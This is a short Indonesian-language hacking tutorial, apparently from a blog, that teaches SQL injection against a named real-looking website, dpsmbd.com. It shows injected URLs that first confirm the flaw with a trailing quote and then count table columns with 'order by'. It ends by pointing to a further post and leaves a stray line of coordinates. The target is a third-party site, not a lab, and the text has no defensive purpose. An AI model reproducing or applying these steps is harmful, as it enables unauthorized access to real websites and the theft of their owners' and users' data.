SQL INJECTION TUTOR/ HACKING WEB

TUTORIAL PERTAMA:

Pertama cari target yg mengandung bug’s atau situs2 VULN…disini target kita adalah

” http://www.dpsmbd.com ”

Contoh:

http://www.dpsmbd.com/newsdetail.php?id=1  <— nampak biasa ( lalu beri tanda string (‘) di belakang’a…)

menjadi :

http://www.dpsmbd.com/newsdetail.php?id=1‘ <— muncul error SQL ( berarti situs ini VULN )

ket: Bisa juga dengan ?id=1…

setelah itu mulai mencari jumlah urutan table dengan order by ( dalam beberapa kasus order by tidak akan berfungsi…)

Contoh :

http://www.dpsmbd.com/newsdetail.php?id=-1 order by 2–   <– beri tanda min (-) didepan dan tanda (–) dibelakang sebagai maksud pembuka dan penutup,

jika situs masih tampak normal silahkan Baca pos ini lebih lanjut

-6.257053 107.322855